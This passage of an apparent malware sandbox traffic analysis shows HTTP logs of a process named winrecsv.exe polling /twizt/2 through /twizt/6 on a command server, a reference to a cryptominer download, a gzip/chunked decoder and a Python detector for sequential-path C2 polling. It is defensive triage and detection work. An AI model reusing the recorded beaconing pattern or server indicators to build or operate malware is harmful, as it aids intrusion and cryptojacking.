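        out += body[pos:pos + size]
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += size + 2


def gzip_trailer(member: bytes) -> Tuple[int, int]:
    """Return (CRC32, ISIZE) from the last 8 bytes of a gzip member (RFC 1952)."""
    crc, isize = struct.unpack("<II", member[-8:])
    return crc, isize


def decode_response(raw: bytes) -> bytes:
    """Chunked + gzip body -> plaintext entity body, with the trailer re-verified."""
    member = dechunk(raw)
    if member[:2] != b"\x1f\x8b":
        raise ValueError("chunk payload is not a gzip member")
    plain = gzip.decompress(member)                 # already checks CRC32 and ISIZE
    crc, isize = gzip_trailer(member)
    # Re-check explicitly so the contract a hand-rolled decoder must meet is visible.
    if zlib.crc32(plain) & 0xFFFFFFFF != crc or len(plain) != isize:
        raise ValueError("gzip trailer does not match decompressed data")
    return plain


if __name__ == "__main__":
    page = decode_response(RAW)
    print(len(page), "bytes")
    print(page.decode("ascii"))
```

Running it prints the stock nginx/1.18.0 404 page, 564 bytes including the six "padding" comment lines, i.e. the same body that 185.215.113.66 serves uncompressed with Content-Length: 564. For triage that settles what 509517324.exe got back from /xmrminer.exe: an HTML error page, not a PE.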


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                4 | 192.168.2.7 | 49778 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:31:48.254514933 CEST | 1049 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:48.316487074 CEST | 1050 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:48 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:49.321367979 CEST | 1050 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:49.379162073 CEST | 1051 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:49 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:50.398318052 CEST | 1051 | OUT | GET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:50.455815077 CEST | 1052 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:50 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:51.491883039 CEST | 1053 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:51.786901951 CEST | 1053 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:51.831628084 CEST | 1054 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:51 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:52.854788065 CEST | 1071 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:52.912606001 CEST | 1071 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:52 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
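What sessions 4 and 5 record is the behaviour worth keying a detection on rather than any single URL: winrecsv.exe walks /twizt/2 through /twizt/6 on 185.215.113.66 about one second apart, with a fixed Chrome 93 User-Agent, repeats /twizt/5 once, gets a 404 for every probe, and then starts the same walk again on a new connection. The following is an added example, not code from the Joe Sandbox report or from the malware: it encodes session 4's rows as constructed HttpRequest records (the record shape and the min_run threshold are this example's own choices) and flags any process/host/path-prefix group that issues consecutive numeric path suffixes in order, reporting retries and whether every answer was a 404. Session 3's single /xmrminer.exe fetch is included as a negative case.

```python
"""Flag the sequential-path C2 polling pattern recorded in sessions 4 and 5."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class HttpRequest:
    process: str
    host: str
    path: str
    user_agent: str
    status: Optional[int]          # None if no response was captured


# Constructed from the session 4 rows above; not parsed from the report itself.
UA_CHROME = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36")
SESSION_4 = [
    HttpRequest(r"C:\Windows\winrecsv.exe", "185.215.113.66", "/twizt/%d" % n, UA_CHROME, 404)
    for n in (2, 3, 4, 5, 5, 6)    # /twizt/5 was sent twice before its 404 arrived
]
# Session 3 for contrast: one fetch of a named payload, no numeric walk.
UA_MSIE = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; "
           ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)")
SESSION_3 = [HttpRequest(r"C:\Users\user\AppData\Local\Temp\509517324.exe",
                         "185.215.113.84", "/xmrminer.exe", UA_MSIE, 404)]

_NUMERIC_TAIL = re.compile(r"^(?P<prefix>.*/)(?P<n>\d+)$")
GroupKey = Tuple[str, str, str]    # (process, host, path prefix)


def find_sequential_polling(requests: Iterable[HttpRequest],
                            min_run: int = 3) -> Dict[GroupKey, dict]:
    """Return request groups (same process, host and path prefix) whose numeric
    path suffixes are issued in non-decreasing order and cover a consecutive
    range of at least min_run distinct values, e.g. /twizt/2 .. /twizt/6.
    Each finding records the suffix sequence, the number of retried probes,
    the status codes seen and the User-Agent strings used.  min_run is an
    illustrative threshold, not a value taken from the report."""
    groups: Dict[GroupKey, List[Tuple[int, HttpRequest]]] = defaultdict(list)
    for req in requests:
        m = _NUMERIC_TAIL.match(req.path)
        if m:
            groups[(req.process, req.host, m["prefix"])].append((int(m["n"]), req))

    findings: Dict[GroupKey, dict] = {}
    for key, items in groups.items():
        ns = [n for n, _ in items]
        distinct = sorted(set(ns))
        if len(distinct) < min_run:
            continue
        if ns != sorted(ns):                                        # walked out of order
            continue
        if distinct != list(range(distinct[0], distinct[-1] + 1)):  # gaps in the range
            continue
        statuses = {req.status for _, req in items}
        findings[key] = {
            "suffixes": ns,
            "retries": len(ns) - len(distinct),
            "statuses": statuses,
            "user_agents": {req.user_agent for _, req in items},
            # Every probe answered 404: the walk itself, not any returned
            # content, is the indicator to alert on.
            "all_not_found": statuses == {404},
        }
    return findings


if __name__ == "__main__":
    for key, info in find_sequential_polling(SESSION_4 + SESSION_3).items():
        print(key, info)
```

Feeding it both sessions yields exactly one finding, for (winrecsv.exe, 185.215.113.66, /twizt/): suffixes [2, 3, 4, 5, 5, 6], one retry, statuses {404}. Session 5 is the same walk from source port 49785 and would produce the same group; if you key additionally on connection, the two sessions become two findings, which is itself a useful signal that the client restarts the sequence from /twizt/2 rather than resuming.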


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                5 | 192.168.2.7 | 49785 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:31:56.131560087 CEST | 1126 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:56.187637091 CEST | 1127 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:56 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:57.197448969 CEST | 1127 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:57.253489017 CEST | 1128 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:57 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 